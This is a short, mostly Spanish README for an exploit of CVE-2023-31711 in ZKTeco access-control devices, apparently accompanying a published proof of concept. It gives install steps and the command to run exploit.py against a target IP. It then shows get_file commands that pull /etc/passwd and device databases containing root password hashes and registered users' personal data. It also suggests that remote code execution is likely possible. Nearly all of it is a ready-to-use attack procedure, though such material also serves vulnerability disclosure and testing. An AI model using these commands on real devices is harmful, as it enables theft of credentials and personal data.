CVE-2023-31711
Control de acceso incorrecto en ZKTECO permite a atacantes remotos leer cualquier archivo a través de la API administrativa.
Instalación de los módulos requeridos
- Dentro del directorio ZKTEco:
$ pip install -r ./pyzatt/requirements_dev.txt
Ejecución del exploit
- Dentro del directorio ZKTEco:
$ python exploit.py <ip_address>
Connected to 10.0.2.25
(Cmd) get_file <file_name>
Examples:
get_file /etc/passwd: Disclosed root password's hash
get_file /mnt/mtdblock/data/ZKDB.db: Disclosed PII of registered users. To read the contents, you might need to run this command sequentially as many times till the whole contents
get disclosed
get_file /mnt/mtdblock/data/ZKSystem.db: Disclosed sensitive information related to the system
Créditos
Nota
Los dispositivos también podrían ser potencialmente vulnerables a la ejecución remota de código mediante el uso de la API administrativa. El exploit mencionado en la sección de créditos podría ser un buen lugar para encontrar una prueba de ello.